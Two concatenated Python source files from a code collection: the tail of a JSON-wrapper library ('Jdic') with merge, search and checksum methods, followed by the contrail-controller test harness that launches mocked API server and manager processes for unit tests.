if not unique_t:
return with_obj
if unique_t and isinstance(obj, Mapping):
obj = self._merge_dicts(obj, with_obj, arr_mode)
else:
obj = self._merge_arrays(obj, with_obj, arr_mode)
return obj
def _merge_arrays(self, arr, with_arr, mode="replace"):
if mode == "replace":
return with_arr
if mode == "append":
return arr + with_arr
if mode == "new":
for val in with_arr:
if val not in arr:
arr.append(val)
return arr
if mode == "merge":
arr_l = len(arr)
for index, val in enumerate(with_arr):
if index >= arr_l:
arr.append(val)
else:
if self._is_iterable(arr[index]) and self._is_iterable(with_arr[index]):
arr[index] = self._merge(arr[index], with_arr[index], mode)
else:
arr[index] = with_arr[index]
return arr
raise NotImplementedError('Merge array mode "{}" not implemented'.format(mode))
def _merge_dicts(self, dic, with_dic, arr_mode):
for k in with_dic:
if k not in dic:
dic[k] = with_dic[k]
else:
if self._is_iterable(dic[k]) and self._is_iterable(with_dic[k]):
dic[k] = self._merge(dic[k], with_dic[k], arr_mode)
else:
dic[k] = with_dic[k]
return dic
def _serialize_to_jdic(self, iterable, parent=None):
if isinstance(iterable, Mapping):
iterable = dict(iterable)
elif isinstance(iterable, Sequence):
iterable = list(iterable)
res = type(iterable)()
for key, val in jdic_enumerate(iterable):
if isinstance(res, dict):
key = str(key)
val = self._input_serialize(val)
if self._is_iterable(val):
val = jdic_create(val, _parent=parent, _key=key)
if isinstance(res, dict):
res[key] = val
else:
res.append(val)
return res
@staticmethod
def _unique_type(*args):
result = None
for val in args:
type_val = type(val)
if not result:
result = type_val
elif result != type_val:
return None
return result
##
# PUBLIC FUNCTIONS
##
def browse(self, sort=False, depth=None, maxdepth=None, _start=True):
"""
Iterates on each JSON entry in a recursive fashion
Arguments:
- sort: bool. If True keys in dicts are alphabetically sorted before values are yielded.
- depth: an integer between 0 and +inf. Results are only yielded at this depth.
- maxdepth: an integer between 0 and +inf. Results won't be yielded past this depth.
"""
# pylint: disable=protected-access
if maxdepth is not None and maxdepth >= 0 and self._depth > maxdepth:
return
if depth is not None and self._depth > depth:
return
parent_path = None if self._parent is None else self._parent._path
if depth is None and _start:
yield MatchResult(parent=self._parent, parent_path=parent_path, key=self._key,
value=self, path=self._path, depth=self._depth)
for key, val in jdic_enumerate(self._obj, sort=sort):
path = self._driver.add_to_path(self._path, key)
if depth is None or depth == self._depth:
yield MatchResult(parent=self, parent_path=self._path, key=key,
value=val, path=path, depth=self._depth)
if isinstance(val, Jdic):
yield from val.browse(sort=sort, depth=depth, maxdepth=maxdepth, _start=False)
def checksum(self, algo='sha256'):
""" Returns an ASCII hexadecimal checksum representing the state of the object """
if 'checksum' in self._cache:
return self._cache['checksum']
hash_ = hashlib.new(algo)
hash_.update(type(self._obj).__name__.encode('utf-8'))
for key, val in jdic_enumerate(self._obj, sort=True):
if isinstance(val, Jdic):
data = "{}:{}:{}:{}".format(type(key).__name__, key,
type(val).__name__, val.checksum())
else:
data = "{}:{}:{}:{}".format(type(key).__name__, key,
type(val).__name__, val)
hash_.update(data.encode('utf-8'))
checksum = hash_.hexdigest()
self._cache['checksum'] = checksum
return checksum
def deepness(self):
""" Returns an integer representing how deep the Jdic object is """
if 'deepness' in self._cache:
return self._cache['deepness']
deepness = 0
for val in self.browse():
if isinstance(val.value, Jdic):
depth = val.value.depth()
if depth > deepness:
deepness = depth
self._cache['deepness'] = deepness
return deepness
def depth(self):
""" Returns an integer representing the depth of the current Jdic object """
return self._depth
def diff(self, obj):
""" Returns a delta between this object and obj """
if isinstance(obj, Jdic):
obj = obj.raw()
return json_delta.diff(self.raw(), obj, verbose=False)
def enumerate(self, sort=False):
""" Yields a key, value pair with both Jdic Mappings and Sequences """
yield from jdic_enumerate(self._obj, sort=sort)
def find(self, value, limit=None, sort=False, depth=None, maxdepth=None):
""" Finds a value within the Jdic object, the search is recursive """
# pylint: disable=too-many-arguments
if limit == 0:
return
num = 0
for res in self.browse(sort=sort, depth=depth, maxdepth=maxdepth):
if res.value == value:
yield res
num += 1
if self._is_limit_reached(num, limit):
return
def find_keys(self, keys, mode="any", sort=False,
limit=None, depth=None, maxdepth=None):
""" Find one or multiple keys within the Jdic object """
# pylint: disable=too-many-arguments
if limit is not None and limit == 0:
return
if not isinstance(keys, list):
keys = [keys]
num = 0
for match in self.browse(sort=sort, depth=depth, maxdepth=maxdepth):
if isinstance(match.value, Jdic):
if self._keys_in(match.value, keys, mode):
yield match
num += 1
if limit is not None and limit == num:
return
def find_match(self, query, sort=False, limit=None, depth=None, maxdepth=None):
""" Find inner data which match the provided query """
# pylint: disable=too-many-arguments
if limit == 0 or not maxdepth == 0:
return
num = 0
for res in self.browse(sort=sort, depth=depth, maxdepth=maxdepth):
if self._match(res.value, query):
yield res
num += 1
if self._is_limit_reached(num, limit):
break
def json(self, sort_keys=False, indent=0, ensure_ascii=False):
""" Returns a string of the object in JSON format """
return json.dumps(self.raw(), sort_keys=sort_keys,
indent=indent, ensure_ascii=ensure_ascii)
def leaves(self, sort=False, depth=None, maxdepth=None):
""" Iterates recursively, raises leaves of the object only """
for res in self.browse(sort=sort, depth=depth, maxdepth=maxdepth):
if self._is_json_leaf(res.value):
yield res
def nb_leaves(self):
""" Return an integer, the number of leaves within the Jdic object """
if 'nb_leaves' in self._cache:
return self._cache['nb_leaves']
nb_leaves = 0
for _ in self.leaves():
nb_leaves += 1
self._cache['nb_leaves'] = nb_leaves
return nb_leaves
def match(self, query):
""" Returns True if the object matches against query, False otherwise """
return self._match(self._obj, query)
def merge(self, objs, arr_mode="replace"):
""" Make a deep merge of the current Jdic object with one or more objects """
if not isinstance(objs, list):
objs = [objs]
for with_obj in objs:
if (isinstance(with_obj, Mapping) and not isinstance(self._obj, Mapping)) or\
(not isinstance(with_obj, Mapping) and isinstance(self._obj, Mapping)):
raise TypeError('Cannot merge "{}" with "{}"'.format(
type(self._obj),
type(with_obj)))
result = self._merge(self._obj, with_obj, arr_mode)
self._jdic_reload(result)
return self
def new(self, _obj=None):
""" Returns a copy of the current object """
if _obj is None:
_obj = self._obj
return jdic_create(_obj, serializer=self._serializer,
driver=self._driver_name, schema=self._schema)
def parent(self, generation=1):
""" Returns the Jdic object parent of this object """
# pylint: disable=protected-access
if generation < 1:
return None
res = self._parent
while generation > 1 and res is not None:
res = res._parent
generation = generation - 1
return res
def patch(self, diff):
""" Takes a delta (from diff()) and applies it to update the object """
if not diff:
return
res = json_delta.patch(self.raw(), diff)
if self._is_iterable(res):
return self.new(res)
return res
def path(self):
""" Return the path of the current Jdic object within its hierarchy """
return self._path
def raw(self, _obj=None, _cache=False):
""" Returns a copy of the current object in basic Python types """
if _cache and 'raw' in self._cache:
return self._cache['raw']
obj = _obj if _obj else self._obj
res = type(obj)()
for key, val in jdic_enumerate(obj):
if isinstance(val, Jdic):
val = val.raw(_cache=_cache)
if isinstance(res, dict):
res[key] = val
else:
res.append(val)
self._cache['raw'] = res
return res
def validate(self, schema=None):
""" Validates the current Jdic object against a JSON schema """
if schema is not None:
return jsonschema.validate(self.raw(), schema)
elif schema is None and self._schema is not None:
return jsonschema.validate(self.raw(), self._schema)
raise ValueError('The current object is not supervised by any schema')
class JdicSequence(Jdic, Sequence):
""" A wrapper for Jdics with Sequence root types (usually list) """
class JdicMapping(Jdic, Mapping):
""" A wrapper for Jdics with Mapping root types (usually dict) """
def jdic_create(iterable, **kwargs):
""" This function returns a Jdic correctly typped according to the data root type """
if isinstance(iterable, Mapping):
return JdicMapping(iterable, **kwargs)
elif isinstance(iterable, Sequence):
return JdicSequence(iterable, **kwargs)
else:
raise ValueError('Cannot create Jdic object from "{}"'.format(type(iterable)))
def jdic_enumerate(obj, sort=False):
""" Will enumerate dicts and list in a similar fashion, to ease iterables browsing """
if isinstance(obj, Mapping):
try:
keys = sorted(obj.keys()) if sort else obj
except TypeError:
keys = sorted(dict(obj).keys()) if sort else obj
for k in keys:
yield (k, obj[k])
elif isinstance(obj, Sequence):
ind = 0
for val in obj:
yield (ind, val)
ind += 1
else:
raise TypeError('Cannot enumerate objects of type "{}"'.format(type(obj)))
| unlicense | 7,458,643,821,538,832,000 | 34.858108 | 99 | 0.554127 | false |
rombie/contrail-controller | src/config/common/tests/test_common.py | 1 | 42367 | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import sys
import gevent.monkey
gevent.monkey.patch_all()
import logging
import tempfile
import mock
from pprint import pformat
import coverage
import fixtures
import testtools
from testtools import content
from flexmock import flexmock
from webtest import TestApp
import contextlib
from netaddr import IPNetwork, IPAddress
from vnc_api.vnc_api import *
import kombu
import cfgm_common.zkclient
from cfgm_common.uve.vnc_api.ttypes import VncApiConfigLog
from cfgm_common import vnc_cgitb
from cfgm_common.utils import cgitb_hook
from test_utils import *
import bottle
bottle.catchall=False
import inspect
import novaclient
import novaclient.client
import gevent.pywsgi
import uuid
from pysandesh import sandesh_logger
def lineno():
"""Returns the current line number in our program."""
return inspect.currentframe().f_back.f_lineno
# end lineno
try:
import vnc_cfg_api_server
if not hasattr(vnc_cfg_api_server, 'main'):
from vnc_cfg_api_server import vnc_cfg_api_server
except ImportError:
vnc_cfg_api_server = 'vnc_cfg_api_server could not be imported'
try:
import to_bgp
except ImportError:
try:
from schema_transformer import to_bgp
except ImportError:
to_bgp = 'to_bgp could not be imported'
try:
import svc_monitor
if not hasattr(svc_monitor, 'main'):
from svc_monitor import svc_monitor
except ImportError:
svc_monitor = 'svc_monitor could not be imported'
try:
import device_manager
if hasattr(device_manager, 'DeviceManager'):
import dm_server
else:
from device_manager import dm_server
from device_manager import device_manager
except ImportError:
device_manager = 'device_manager could not be imported'
try:
from kube_manager import kube_manager
if not hasattr(kube_manager, 'main'):
from kube_manager import kube_manager
except ImportError:
kube_manager = 'kube_manager could not be imported'
try:
from mesos_manager import mesos_manager
if not hasattr(mesos_manager, 'main'):
from mesos_manager import mesos_manager
except ImportError:
mesos_manager = 'mesos_manager could not be imported'
def generate_conf_file_contents(conf_sections):
cfg_parser = ConfigParser.RawConfigParser()
for (section, var, val) in conf_sections:
try:
cfg_parser.add_section(section)
except ConfigParser.DuplicateSectionError:
pass
if not var:
continue
if val == '':
cfg_parser.set(section, var, 'empty')
else:
cfg_parser.set(section, var, val)
return cfg_parser
# end generate_conf_file_contents
def generate_logconf_file_contents():
cfg_parser = ConfigParser.RawConfigParser()
cfg_parser.add_section('formatters')
cfg_parser.add_section('formatter_simple')
cfg_parser.set('formatters', 'keys', 'simple')
cfg_parser.set('formatter_simple', 'format', '%(name)s:%(levelname)s: %(message)s')
cfg_parser.add_section('handlers')
cfg_parser.add_section('handler_console')
cfg_parser.add_section('handler_api_server_file')
cfg_parser.set('handlers', 'keys', 'console,api_server_file')
cfg_parser.set('handler_console', 'class', 'StreamHandler')
cfg_parser.set('handler_console', 'level', 'WARN')
cfg_parser.set('handler_console', 'args', '[]')
cfg_parser.set('handler_console', 'formatter', 'simple')
cfg_parser.set('handler_api_server_file', 'class', 'FileHandler')
cfg_parser.set('handler_api_server_file', 'level', 'INFO')
cfg_parser.set('handler_api_server_file', 'formatter', 'simple')
cfg_parser.set('handler_api_server_file', 'args', "('api_server.log',)")
cfg_parser.add_section('loggers')
cfg_parser.add_section('logger_root')
cfg_parser.add_section('logger_FakeWSGIHandler')
cfg_parser.set('loggers', 'keys', 'root,FakeWSGIHandler')
cfg_parser.set('logger_root', 'level', 'WARN')
cfg_parser.set('logger_root', 'handlers', 'console')
cfg_parser.set('logger_FakeWSGIHandler', 'level', 'INFO')
cfg_parser.set('logger_FakeWSGIHandler', 'qualname', 'FakeWSGIHandler')
cfg_parser.set('logger_FakeWSGIHandler', 'handlers', 'api_server_file')
return cfg_parser
# end generate_logconf_file_contents
def launch_kube_manager(test_id, conf_sections, kube_api_skip, event_queue,
vnc_kubernetes_config_dict=None):
args_str = ""
vnc_cgitb.enable(format='text')
wait_for_kube_manager_down()
with tempfile.NamedTemporaryFile() as conf, tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str= ["-c", conf.name]
kube_manager.main(args_str, kube_api_skip=kube_api_skip,
event_queue=event_queue,
vnc_kubernetes_config_dict=vnc_kubernetes_config_dict)
#end launch_kube_manager
def launch_mesos_manager(test_id, conf_sections, mesos_api_skip, event_queue):
args_str = ""
vnc_cgitb.enable(format='text')
wait_for_mesos_manager_down()
with tempfile.NamedTemporaryFile() as conf, tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str= ["-c", conf.name]
mesos_manager.main(args_str, mesos_api_skip=mesos_api_skip, event_queue=event_queue)
#end launch_mesos_manager
def retry_exc_handler(tries_remaining, exception, delay):
print >> sys.stderr, "Caught '%s', %d tries remaining, sleeping for %s seconds" % (exception, tries_remaining, delay)
# end retry_exc_handler
def retries(max_tries, delay=1, backoff=2, exceptions=(Exception,), hook=None):
def dec(func):
def f2(*args, **kwargs):
mydelay = delay
tries = range(max_tries)
tries.reverse()
for tries_remaining in tries:
try:
return func(*args, **kwargs)
except exceptions as e:
if tries_remaining > 0:
if hook is not None:
hook(tries_remaining, e, mydelay)
gevent.sleep(mydelay)
mydelay = mydelay * backoff
else:
raise
else:
break
return f2
return dec
# end retries
class VncTestApp(TestApp):
def post_json(self, *args, **kwargs):
resp = super(VncTestApp, self).post_json(*args, **kwargs)
resp.charset = 'UTF-8'
return resp
#end class VncTestApp
def create_api_server_instance(test_id, config_knobs, db='cassandra'):
ret_server_info = {}
allocated_sockets = []
ret_server_info['ip'] = socket.gethostbyname(socket.gethostname())
ret_server_info['service_port'] = get_free_port(allocated_sockets)
ret_server_info['introspect_port'] = get_free_port(allocated_sockets)
ret_server_info['admin_port'] = get_free_port(allocated_sockets)
ret_server_info['allocated_sockets'] = allocated_sockets
if db == "cassandra":
ret_server_info['greenlet'] = gevent.spawn(launch_api_server,
test_id, ret_server_info['ip'], ret_server_info['service_port'],
ret_server_info['introspect_port'], ret_server_info['admin_port'],
config_knobs)
else:
msg = ("Contrail API server does not support database backend "
"'%s'" % db)
raise NotImplementedError(msg)
block_till_port_listened(ret_server_info['ip'],
ret_server_info['service_port'])
extra_env = {'HTTP_HOST': ret_server_info['ip'],
'SERVER_PORT': str(ret_server_info['service_port'])}
api_server_obj = ret_server_info['greenlet'].api_server
ret_server_info['app'] = VncTestApp(api_server_obj.api_bottle,
extra_environ=extra_env)
ret_server_info['api_conn'] = VncApi('u', 'p',
api_server_host=ret_server_info['ip'],
api_server_port=ret_server_info['service_port'])
if FakeNovaClient.vnc_lib is None:
FakeNovaClient.vnc_lib = ret_server_info['api_conn']
ret_server_info['api_session'] = requests.Session()
adapter = requests.adapters.HTTPAdapter()
ret_server_info['api_session'].mount("http://", adapter)
ret_server_info['api_session'].mount("https://", adapter)
ret_server_info['api_server'] = api_server_obj
ret_server_info['api_server']._sandesh.set_logging_level(level="SYS_DEBUG")
return ret_server_info
# end create_api_server_instance
def destroy_api_server_instance(server_info):
server_info['greenlet'].kill()
if hasattr(server_info['api_server']._db_conn, '_msgbus'):
server_info['api_server']._db_conn._msgbus.shutdown()
vhost_url = server_info['api_server']._db_conn._msgbus._urls
FakeKombu.reset(vhost_url)
FakeNovaClient.reset()
CassandraCFs.reset()
FakeKazooClient.reset()
FakeExtensionManager.reset()
for sock in server_info['allocated_sockets']:
sock.close()
# end destroy_api_server_instance
def destroy_api_server_instance_issu(server_info):
server_info['greenlet'].kill()
server_info['api_server']._db_conn._msgbus.shutdown()
vhost_url = server_info['api_server']._db_conn._msgbus._urls
for sock in server_info['allocated_sockets']:
sock.close()
# end destroy_api_server_instance
def launch_api_server(test_id, listen_ip, listen_port, http_server_port,
admin_port, conf_sections):
kombu_mock = mock.Mock()
kombu_patch = mock.patch(
'vnc_cfg_api_server.vnc_cfg_api_server.KombuAmqpClient')
kombu_init_mock = kombu_patch.start()
kombu_init_mock.side_effect = kombu_mock
args_str = ""
args_str = args_str + "--listen_ip_addr %s " % (listen_ip)
args_str = args_str + "--listen_port %s " % (listen_port)
args_str = args_str + "--http_server_port %s " % (http_server_port)
args_str = args_str + "--admin_port %s " % (admin_port)
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file api_server_%s.log " %(test_id)
args_str = args_str + "--cluster_id %s " %(test_id)
vnc_cgitb.enable(format='text')
with tempfile.NamedTemporaryFile() as conf, \
tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str = args_str + "--conf_file %s " %(conf.name)
args_str = args_str + "--logging_conf %s " %(logconf.name)
server = vnc_cfg_api_server.VncApiServer(args_str)
gevent.getcurrent().api_server = server
vnc_cfg_api_server.main(args_str, server)
# end launch_api_server
def launch_svc_monitor(cluster_id, test_id, api_server_ip, api_server_port, **extra_args):
allocated_sockets = []
args_str = ""
args_str += "--cluster_id %s " % (cluster_id)
args_str += "--api_server_ip %s " % (api_server_ip)
args_str += "--api_server_port %s " % (api_server_port)
args_str += "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str += "--cassandra_server_list 0.0.0.0:9160 "
args_str += "--log_local "
args_str += "--log_file svc_monitor_%s.log " %(test_id)
args_str += "--trace_file svc_monitor_%s.err " %(test_id)
args_str += "--check_service_interval 2 "
for name, value in extra_args.items():
args_str += "--{name} {value} ".format(name=name, value=value)
svc_monitor.main(args_str)
# end launch_svc_monitor
def kill_svc_monitor(glet):
glet.kill()
svc_monitor.SvcMonitor.reset()
def kill_schema_transformer(glet):
glet.kill()
to_bgp.SchemaTransformer.destroy_instance()
def kill_device_manager(glet):
glet.kill()
dm_server.sigterm_handler()
def kill_kube_manager(glet):
glet.kill()
kube_manager.KubeNetworkManager.destroy_instance()
def kill_mesos_manager(glet):
glet.kill()
mesos_manager.MesosNetworkManager.destroy_instance()
def reinit_schema_transformer():
for obj_cls in to_bgp.DBBaseST.get_obj_type_map().values():
obj_cls.reset()
to_bgp.transformer.reinit()
def launch_schema_transformer(cluster_id, test_id, api_server_ip,
api_server_port, extra_args=None):
allocated_sockets = []
wait_for_schema_transformer_down()
args_str = ""
args_str = args_str + "--cluster_id %s " % (cluster_id)
args_str = args_str + "--api_server_ip %s " % (api_server_ip)
args_str = args_str + "--api_server_port %s " % (api_server_port)
args_str = args_str + "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file schema_transformer_%s.log " %(test_id)
args_str = args_str + "--trace_file schema_transformer_%s.err " %(test_id)
if extra_args:
args_str = args_str + (extra_args)
to_bgp.main(args_str)
# end launch_schema_transformer
def launch_device_manager(test_id, api_server_ip, api_server_port,
conf_sections=None):
kombu_mock = mock.Mock()
kombu_patch = mock.patch(
'device_manager.dm_server.KombuAmqpClient')
kombu_init_mock = kombu_patch.start()
kombu_init_mock.side_effect = kombu_mock
wait_for_device_manager_down()
allocated_sockets = []
args_str = ""
args_str = args_str + "--cluster_id %s " % (test_id)
args_str = args_str + "--api_server_ip %s " % (api_server_ip)
args_str = args_str + "--api_server_port %s " % (api_server_port)
args_str = args_str + "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file device_manager_%s.log " %(test_id)
if conf_sections is not None:
with tempfile.NamedTemporaryFile() as conf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
args_str = args_str + "--conf_file %s " % conf.name
dm_server.main(args_str)
else:
dm_server.main(args_str)
# end launch_device_manager
@retries(5, hook=retry_exc_handler)
def wait_for_schema_transformer_up():
if not to_bgp.SchemaTransformer.get_instance():
raise Exception("ST instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_schema_transformer_down():
if to_bgp.SchemaTransformer.get_instance():
raise Exception("ST instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_device_manager_up():
if not device_manager.DeviceManager.get_instance():
raise Exception("DM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_device_manager_down():
if device_manager.DeviceManager.get_instance():
raise Exception("DM instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_kube_manager_up():
if not kube_manager.KubeNetworkManager.get_instance():
raise Exception("KM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_kube_manager_down():
if kube_manager.KubeNetworkManager.get_instance():
raise Exception("KM instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_mesos_manager_up():
if not mesos_manager.MesosNetworkManager.get_instance():
raise Exception("MM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_mesos_manager_down():
if mesos_manager.MesosNetworkManager.get_instance():
raise Exception("MM instance is up, no new instances allowed")
@contextlib.contextmanager
def flexmocks(mocks):
orig_values = {}
try:
for cls, method_name, val in mocks:
kwargs = {method_name: val}
# save orig cls.method_name
orig_values[(cls, method_name)] = getattr(cls, method_name)
flexmock(cls, **kwargs)
yield
finally:
for (cls, method_name), method in orig_values.items():
setattr(cls, method_name, method)
# end flexmocks
def setup_extra_flexmock(mocks):
for (cls, method_name, val) in mocks:
kwargs = {method_name: val}
flexmock(cls, **kwargs)
# end setup_extra_flexmock
def setup_mocks(mod_attr_val_list):
# use setattr instead of flexmock because flexmocks are torndown
# after every test in stopTest whereas these mocks are needed across
# all tests in class
orig_mod_attr_val_list = []
for mod, attr, val in mod_attr_val_list:
orig_mod_attr_val_list.append(
(mod, attr, getattr(mod, attr)))
setattr(mod, attr, val)
return orig_mod_attr_val_list
#end setup_mocks
def teardown_mocks(mod_attr_val_list):
for mod, attr, val in mod_attr_val_list:
setattr(mod, attr, val)
# end teardown_mocks
@contextlib.contextmanager
def patch(target_obj, target_method_name, patched):
orig_method = getattr(target_obj, target_method_name)
def patched_wrapper(*args, **kwargs):
return patched(orig_method, *args, **kwargs)
setattr(target_obj, target_method_name, patched_wrapper)
try:
yield
finally:
setattr(target_obj, target_method_name, orig_method)
#end patch
@contextlib.contextmanager
def patch_imports(imports):
# save original, patch and restore
orig_modules = {}
mocked_modules = []
try:
for import_str, fake in imports:
cur_module = None
for mod_part in import_str.split('.'):
if not cur_module:
cur_module = mod_part
else:
cur_module += "." + mod_part
if cur_module in sys.modules:
orig_modules[cur_module] = sys.modules[cur_module]
else:
mocked_modules.append(cur_module)
sys.modules[cur_module] = fake
yield
finally:
for mod_name, mod in orig_modules.items():
sys.modules[mod_name] = mod
for mod_name in mocked_modules:
del sys.modules[mod_name]
#end patch_import
cov_handle = None
class TestCase(testtools.TestCase, fixtures.TestWithFixtures):
_HTTP_HEADERS = {
'Content-type': 'application/json; charset="UTF-8"',
}
_config_knobs = [
('DEFAULTS', '', ''),
]
mocks = [
(novaclient.client, 'Client', FakeNovaClient.initialize),
(pycassa.system_manager.Connection, '__init__',stub),
(pycassa.system_manager.SystemManager, '__new__',FakeSystemManager),
(pycassa.ConnectionPool, '__new__',FakeConnectionPool),
(pycassa.ColumnFamily, '__new__',FakeCF),
(pycassa.util, 'convert_uuid_to_time',Fake_uuid_to_time),
(kazoo.client.KazooClient, '__new__',FakeKazooClient),
(kazoo.recipe.counter.Counter, '__init__',fake_zk_counter_init),
(kazoo.recipe.counter.Counter, '_change',fake_zk_counter_change),
(kazoo.recipe.counter.Counter, 'value',fake_zk_counter_value),
(kazoo.recipe.counter.Counter, '_ensure_node',
fake_zk_counter_ensure_node),
(kazoo.handlers.gevent.SequentialGeventHandler, '__init__',stub),
(kombu.Connection, '__new__',FakeKombu.Connection),
(kombu.Exchange, '__new__',FakeKombu.Exchange),
(kombu.Queue, '__new__',FakeKombu.Queue),
(kombu.Consumer, '__new__',FakeKombu.Consumer),
(kombu.Producer, '__new__',FakeKombu.Producer),
(VncApiConfigLog, '__new__',FakeApiConfigLog),
]
def __init__(self, *args, **kwargs):
self._logger = logging.getLogger(__name__)
self._assert_till_max_tries = 600
super(TestCase, self).__init__(*args, **kwargs)
self.addOnException(self._add_detailed_traceback)
def _add_detailed_traceback(self, exc_info):
vnc_cgitb.enable(format='text')
from cStringIO import StringIO
tmp_file = StringIO()
cgitb_hook(format="text", file=tmp_file, info=exc_info)
tb_str = tmp_file.getvalue()
tmp_file.close()
self.addDetail('detailed-traceback', content.text_content(tb_str))
def _add_detail(self, detail_str):
frame = inspect.stack()[1]
self.addDetail('%s:%s ' %(frame[1],frame[2]), content.text_content(detail_str))
def _add_request_detail(self, op, url, headers=None, query_params=None,
body=None):
request_str = ' URL: ' + pformat(url) + \
' OPER: ' + pformat(op) + \
' Headers: ' + pformat(headers) + \
' Query Params: ' + pformat(query_params) + \
' Body: ' + pformat(body)
self._add_detail('Requesting: ' + request_str)
def _http_get(self, uri, query_params=None):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('GET', url, headers=self._HTTP_HEADERS,
query_params=query_params)
response = self._api_server_session.get(url, headers=self._HTTP_HEADERS,
params=query_params)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_get
def _http_post(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('POST', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.post(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_post
def _http_delete(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('DELETE', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.delete(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_delete
def _http_put(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('PUT', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.put(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_put
def _create_test_objects(self, count=1, proj_obj=None):
ret_objs = []
for i in range(count):
obj_name = self.id() + '-vn-' + str(i)
obj = VirtualNetwork(obj_name, parent_obj=proj_obj)
self._add_detail('creating-object ' + obj_name)
self._vnc_lib.virtual_network_create(obj)
ret_objs.append(obj)
return ret_objs
def _create_test_object(self):
return self._create_test_objects()[0]
def _delete_test_object(self, obj):
self._vnc_lib.virtual_network_delete(id=obj.uuid)
def get_cf(self, keyspace_name, cf_name):
ks_name = '%s_%s' %(self._cluster_id, keyspace_name)
return CassandraCFs.get_cf(ks_name, cf_name)
# end get_cf
def vnc_db_has_ident(self, obj=None, id=None, type_fq_name=None):
if obj:
_type = obj.get_type()
_fq_name = obj.get_fq_name()
if id:
_type = self._vnc_lib.id_to_fq_name_type(id)
_fq_name = self._vnc_lib.id_to_fq_name(id)
if type_fq_name:
_type = type_fq_name[0]
_fq_name = type_fq_name[1]
try:
vnc_obj = self._vnc_lib._object_read(_type, _fq_name)
except NoIdError:
return None
return vnc_obj
def vnc_db_ident_has_prop(self, obj, prop_name, prop_value):
vnc_obj = self.vnc_db_has_ident(obj=obj)
if vnc_obj is None:
return False
return getattr(vnc_obj, prop_name) == prop_value
def vnc_db_ident_has_ref(self, obj, ref_name, ref_fq_name):
vnc_obj = self.vnc_db_has_ident(obj=obj)
if vnc_obj is None:
return False
refs = getattr(vnc_obj, ref_name, [])
for ref in refs:
if ref['to'] == ref_fq_name:
return True
return False
def vnc_db_doesnt_have_ident(self, obj=None, id=None, type_fq_name=None):
return not self.vnc_db_has_ident(obj=obj, id=id,
type_fq_name=type_fq_name)
def vnc_db_ident_doesnt_have_ref(self, obj, ref_name, ref_fq_name=None):
return not self.vnc_db_ident_has_ref(obj, ref_name, ref_fq_name)
def assertTill(self, expr_or_cb, *cb_args, **cb_kwargs):
tries = 0
while True:
if callable(expr_or_cb):
ret = expr_or_cb(*cb_args, **cb_kwargs)
else:
ret = eval(expr_or_cb)
if ret:
break
tries = tries + 1
if tries >= self._assert_till_max_tries:
raise Exception('Max retries')
self._logger.warn('Retrying at ' + str(inspect.stack()[1]))
gevent.sleep(0.1)
@classmethod
def setUpClass(cls, extra_mocks=None, extra_config_knobs=None,
db='cassandra'):
super(TestCase, cls).setUpClass()
global cov_handle
if not cov_handle:
cov_handle = coverage.coverage(source=['./'], omit=['.venv/*'])
#cov_handle.start()
cfgm_common.zkclient.LOG_DIR = './'
gevent.pywsgi.WSGIServer.handler_class = FakeWSGIHandler
cls.orig_mocked_values = setup_mocks(cls.mocks + (extra_mocks or []))
cls._cluster_id = cls.__name__
cls._server_info = create_api_server_instance(
cls._cluster_id, cls._config_knobs + (extra_config_knobs or []),
db=db)
try:
cls._api_server_ip = cls._server_info['ip']
cls._api_server_port = cls._server_info['service_port']
cls._api_admin_port = cls._server_info['admin_port']
cls._api_svr_greenlet = cls._server_info['greenlet']
cls._api_svr_app = cls._server_info['app']
cls._vnc_lib = cls._server_info['api_conn']
cls._api_server_session = cls._server_info['api_session']
cls._api_server = cls._server_info['api_server']
except Exception as e:
cls.tearDownClass()
raise
# end setUpClass
@classmethod
def tearDownClass(cls):
destroy_api_server_instance(cls._server_info)
